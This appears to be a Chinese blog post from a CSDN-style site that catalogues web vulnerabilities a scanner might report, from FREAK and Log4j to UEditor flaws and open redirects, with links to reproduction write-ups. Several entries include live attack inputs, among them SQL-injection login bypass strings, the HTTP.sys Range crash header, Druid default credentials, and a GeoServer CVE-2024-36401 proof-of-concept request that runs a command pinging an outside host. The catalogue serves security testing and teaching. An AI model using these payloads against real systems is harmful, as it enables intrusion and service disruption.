FREAK 攻击是一个 SSL/TLS 漏洞,允许攻击者拦截易受攻击的客户端和服务器之间的 HTTPS 连接,并强制它们使用"导出级"加密,然后可以对其进行解密或更改。支持 RSA 导出加密套件的网站存在被拦截 HTTPS 连接的风险。

如何测试FREAK攻击(CVE-2015-0204)并进行修复? - 姚伟斌

SSL在线工具-FREAK漏洞-CVE-2015-0204-SSLeye官网

        

Wordpress wp-cron.php 拒绝服务

当访问wp-cron.php文件时,会执行一个繁重的MySQL查询,因此攻击者可以使用它造成拒绝服务攻击。

WordPress 技巧:禁用 WP Cron-腾讯云开发者社区-腾讯云

不安全的clientaccesspolicy.xml文件

ClientAccessPolicy.xml文件是Silverlights的URL跨域策略文件,为了Silverlights能够跨域访问,通常需要添加跨域策略文件,默认部署在网站根目录下,开发者通过定义URL策略文件ClientAccessPolicy.xml的参数配置允许访问的URL。

跨域策略文件crossdomain.xml文件_不安全的crossdomain.xml文件-CSDN博客

         

Apache Log4j 2远程代码执行(CVE-2021-44228)

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。

在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。

log4j2 远程代码执行漏洞复现(CVE-2021-44228)_log4j命令执行流量特征-CSDN博客

         

长密码拒绝服务

通过发送一个很长的密码(1.000.000 个字符),可能会导致对服务器的拒绝服务攻击。这可能会导致网站不可用或无响应。通常这个漏洞是由易受攻击的密码散列实现引起的。发送长密码时,密码散列过程将导致CPU和内存耗尽。通过发送不同长度的密码并比较响应时间来检测此漏洞。

Web长密码拒绝服务漏洞-腾讯云开发者社区-腾讯云

                 

EyouCms v1.6.3信息泄露 (CVE-2023-37645)

赞赞网络科技EyouCms(易优CMS)是中国赞赞网络科技公司的一套基于ThinkPHP的开源内容管理系统(CMS)。EyouCms 1.6.3版本存在安全漏洞,该漏洞源于组件recruit.filelist.txt存在信息泄露漏洞。

                

表单绕过

表单绕过攻击就是指利用表单存在的安全漏洞,通过构造一些畸形的特殊提交语句,绕过表单安全认证的一种攻击手段,其实也是一种SQL注入攻击。

用户名:admin' or 1=1 --    (--后面加空格,否则无效)
密码任意

表单绕过实验万能密码_‘ or 1=1 or ‘ 密码:任意(2)admin’ - -(或‘ or 1=1 or ‘ - -CSDN博客

web渗透测试之攻破登录页面 - 知乎                

        

登录错误消息凭证枚举

测试发现应用程序在用户名字段无效时会发布一条错误消息,在密码字段无效时会发布另一条错误消息。此行为可能让攻击者能够使用蛮力技术来枚举有效的用户名和密码。

主要危害:暴力破解
                

UEditor 服务端请求伪造

UEditor 是由百度 web 前端研发部开发所见即所得富文本web编辑器,具有轻量、可定制、注重用户体验等特点。UEditor远程文件抓取功能存在服务端请求伪造漏洞,攻击者利用该漏洞可以进行端口扫描和访问内部服务器。

UEditor SSRF漏洞(JSP版本)分析与复现 · 浮萍's Blog

                        

请求走私

Webscan检测到反向代理和Web应用程序之间的HTTP请求解析不一致。未经身份验证的攻击者可能会利用此漏洞并污染其他用户的请求,从而可能导致包括帐户接管在内的各种后果。

HTTP 请求走私漏洞详解_request smuggling-CSDN博客

        

Http.sys远程代码执行

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

Range: bytes=0-18446744073709551615

(十)HTTP.sys远程代码执行 - uestc2007 - 博客园

                

X-Forwarded-For伪造验证绕过

这个目录通常会返回 403 Forbidden HTTP 状态代码。通过欺骗 HTTP 头信息的 "X-Forwarded-For" 和设置各种内部IP地址绕过这个限制。

WEB安全-X-Forwarded-For注入漏洞实战 - icui4cu - 博客园

        

Cookie SQL注入

PHP+Mysql代码为例

$id = $_COOKIE['id']; 
$sql = "SELECT id,login FROM users WHERE id=$id"; 
$result = mysql_db_query($mysql_database, $sql,$conn);   
$row = mysql_fetch_row($result); 

上述代码中变量id,接受COOKIE方式传递的数据,并未对危险字符做过滤,假如客户端提交“-999 UNION SELECT version()...”,将会输出Mysql的数据库版本。

SQL注入实战——cookie注入-CSDN博客

                

Pivotal Spring Framework跨域请求漏洞

该漏洞源于程序允许Web应用程序通过JSONP打开跨域的请求。攻击者可利用该漏洞将用户信息泄露到第三方浏览器脚本。

        

URL重写漏洞

该应用程序支持请求头X-Original-URL或X-Rewrite-URL,用户可以通过X-Original-URL或X-Rewrite-URL HTTP请求头覆盖请求URL中的路径,并允许用户访问一个URL,但让Web应用程序返回另一个URL,从而可以绕过高级别的缓存和Web服务器对URL的限制。​

干货 | 渗透中403/401页面绕过的思路总结 - SecPulse.COM | 安全脉搏

                

Web 缓存中毒 DoS(javascript)

系统缓存具有错误相关状态代码(400、404、501)的响应。攻击者可以向 Web 应用程序的现有 javascript 文件发送格式错误的请求,因此应用程序返回具有此类状态代码的响应,并且缓存系统将其存储。因此,如果其他用户尝试访问该文件,他们将从缓存系统获得到有错误状态的响应。

Web缓存中毒漏洞笔记 - tech_lee - 博客园

        

ThinkPHP 5.0.24信息泄露 (CVE-2022-25481)

顶想信息科技ThinkPHP是中国顶想信息科技公司的一套基于PHP的、开源的、轻量级Web应用程序开发框架。该漏洞源于没有配置PATHINFO参数。攻击者可以从index.php访问所有系统环境参数。

.../index.php?s=example

        

Apache Druid默认口令

Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid存在默认口令。

loginUsername=druid&loginPassword=druid

                

Apache Tomcat 安全漏洞(CVE-2020-13935)

Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。以下产品及版本受到影响:Apache Tomcat 

CVE-2020-13935:Apache Tomcat拒绝服务漏洞复现_cve-2020-13935修复-CSDN博客

        

Apache Tomcat示例文件

当使用默认配置安装Apache Tomcat时,还将安装几个示例文件。这些文件可能会泄露有助于攻击者的敏感信息。

.../examples/servlets/index.html

                

使用GET方法提交的密码字段

此页面包含带有密码字段的表单。此表单使用GET方法提交用户数据,因此密码字段的内容将显示在URL中。不应通过URL传递敏感信息。URL可能会被记录或通过Referer头泄露。

        

DROWN 攻击(支持 SSLv2)

DROWN是一个严重的漏洞,它会影响HTTPS和其他依赖SSL和TLS的服务,SSL和TLS是互联网安全的一些基本加密协议。这些协议允许Internet上的每个人浏览网络、使用电子邮件、在线购物和发送即时消息,而第三方无法读取通信内容。

DROWN允许攻击者破坏加密并读取或窃取敏感通信,包括密码,信用卡号,商业秘密或财务数据。如果服务器在以下情况下容易受到 DROWN 的攻击:它允许SSLv2连接或者它的私钥用于任何其他允许SSLv2连接的服务器,即使是其他协议。 

GitHub - nimia/public_drown_scanner

         

URL重定向

url重定向是指把一个URL重定向到另一个URL上。即把目录或文件的访问请求转发到另外的一个目录或者文件,当用户发出相关访问请求时,系统将自动跳转到指定位置。如果攻击者能控制跳转的对象,则会用于钓鱼、挂马等。

常见参数
redirect 
redirect_to 
redirect_url 
url jump 
jump_to 
target 
to
link 
linkto 
domain

URL重定向漏洞解析 - GorillaLee - 博客园

                

JetBrains IDE workspace.xml文件泄露

由于开发人员使用JetBrains系列开发工具开发web应用,上传代码至服务器时,未排除web开发目录下的.idea文件夹导致该目录被上传至服务器web目录,攻击者可通过泄露的JetBrains .idea/workspace.xml文件获得部分web应用脚本信息。

.../.idea/workspace.xml

                

表单登录弱密码

弱密码(Weak passwords)即容易破译的密码,多为简单的数字组合、帐号相同的数字组合、键盘上的临近键或常见姓名,例如“123456”、“abc123”、“Michael”等。终端设备出厂配置的通用密码等都属于弱密码范畴。

                

GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

漏洞可能导致远程代码执行 (RCE)。未经身份验证的用户可以通过向默认的 GeoServer 安装发送特制的输入,利用多个 OGC 请求参数,如 WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic 和 WPS Execute 请求,从而执行任意代码。

POST /geoserver/wfs HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 320

<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
valueReference='exec(java.lang.Runtime.getRuntime(),"ping hgrabmunnu.dgrh3.cn")'>
<wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

CVE-2024-36401:GeoServer远程代码执行漏洞复现 [附POC]-CSDN博客

        

UEditor 跨站脚本

UEditor 是由百度 web 前端研发部开发所见即所得富文本web编辑器,具有轻量、可定制、注重用户体验等特点。UEditor文件上传接口允许上传xml文件,可导致存储型跨站脚本攻击。

UEditor-结合XML文件上传导致的存储型XSS - GoxHam23 - 博客园

        

LabStack LLC echo 开放重定向 (CVE-2022-40083)

echo是LabStack LLC开源的一个高性能、极简的Go web 框架。该漏洞源于Static Handler 组件存在开放重定向问题,可能导致服务器端请求伪造(SSRF)。

LabStack LLC echo 开放重定向漏洞 (CVE-2022-40083)-CSDN博客

        

Django 开放重定向漏洞 (CVE-2018-14574)

Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。攻击者可利用该漏洞将用户重定向到任意网站。

Django任意URL跳转漏洞(CVE-2018-14574)-CSDN博客

                

Ueditor编辑器.net版本任意文件上传

UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor编辑器.net版本存在任意文件上传漏洞,攻击者可精心构造环境上传文件,获取服务器管理权限。

实战纪实 | 编辑器漏洞之Ueditor-任意文件上传漏洞 (老洞新谈)_ueditor漏洞-CSDN博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值